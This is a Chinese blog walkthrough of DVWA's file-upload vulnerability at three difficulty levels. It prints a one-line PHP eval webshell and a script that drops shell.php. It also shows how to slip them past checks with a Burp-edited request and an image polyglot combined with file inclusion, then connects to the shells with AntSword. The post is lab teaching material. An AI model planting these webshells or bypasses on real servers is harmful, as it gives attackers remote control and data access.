DVWA 文件上传漏洞

DVWA 文件上传漏洞



前言

本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞


一、文件上传漏洞是是什么?

了解文件上传漏洞

二、Shell

1、命令解释器

WindowsLinux
powershellsh
cmdbash
zsh

2、Webshell

Webshell是一种用于攻击计算机系统的恶意脚本或程序,它可以在受攻击的网站或Web服务器上获得未经授权的访问权限。攻击者使用Webshell可以远程控制网站或服务器,并执行各种操作,例如执行任意代码、上传或下载文件、修改数据等。Webshell可以伪装成合法的文件或脚本,并常常隐藏在网站的文件系统中。它们对Web安全构成重大威胁,常被用于Web攻击。
后缀名通常为:

  • php
  • asp
  • aspx
  • jsp
    Webshell 接受来自于 web 用户的命令,然后在服务器端执行,也成为网站木马、木马后门、网马等。
Web容器脚本语言
Apache HTTPDphp
IISasp&aspx&php
Tomcatjsp&jspx

大马,代码量比较打,与小马对比
小马,一句话木马,需要与中国菜刀配合,特点是短小精悍,功能强大。

DVWA

在这里插入图片描述

初级

//初级的可以直接上传php文件,代码如下:
<!-- a.php -->
<?php
@eval($_REQUEST[maple]);
phpinfo();
?>

在这里插入图片描述

进入爆出的网站查看
http://10.4.7.130/dvwa_2.0.1/hackable/uploads/a.php

在这里插入图片描述

可以看到php配置说明上传成功,可以为所欲为了,接下来连接蚁剑

在这里插入图片描述

url地址为上传文件的地址,密码为刚刚给的maple值,测试连接成功就可以添加了

在这里插入图片描述

这里进来是我们上传木马的路径

中级

相比较初级,中级这里会报错

在这里插入图片描述

但是我们可以使用bp抓包,然后修改一个值

在这里插入图片描述

这里就会发现上传成功了,访问一下地址

在这里插入图片描述

蚁剑测试连接

在这里插入图片描述

成功连接

在这里插入图片描述

高级

之前的方法都不能用了,只能让我们上传JPEG或者PNG图片

在这里插入图片描述

我们随便截一个图片,然后将图片和a.php脚本结合,生成一个新图片

copy a.png/b+a.php/a a1.png

在这里插入图片描述

上传这个新的图片

在这里插入图片描述

上传成功,访问地址

在这里插入图片描述

可以进入,我们直接蚁剑测试

在这里插入图片描述

连接失败,我们来到低级文件包含漏洞页面查看一下

在这里插入图片描述

三个文件都查看一下

在这里插入图片描述

一次点击三个文件后发现?page=后面的文件名会变,所以我们尝试输入刚刚上传的文件,看会不会跳转

在这里插入图片描述

发现会跳转,用这个地址连接蚁剑测试一下

在这里插入图片描述

哦豁,居然还是不能连接,尝试传参看看

在这里插入图片描述

这里是成功的,但是连接不了蚁剑,咱们可以换一个代码

<?php
file_put_contents('shell.php','<?php @eval($_REQUEST[maple])?>');
phpinfo();
?>
//这个php脚本的作用是在当前文件夹下写入一个名为shell.php的脚本,内容为一句话木马

重新上传一下

在这里插入图片描述

刚刚从文件包含漏洞中可以得知我们到文件路径是http://10.4.7.130/dvwa_2.0.1/vulnerabilities/fi/..所以我们先访问一下这个文件,让他写出一个shell.php文件,然后使用蚁剑测试连接

在这里插入图片描述

这样就成功了

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值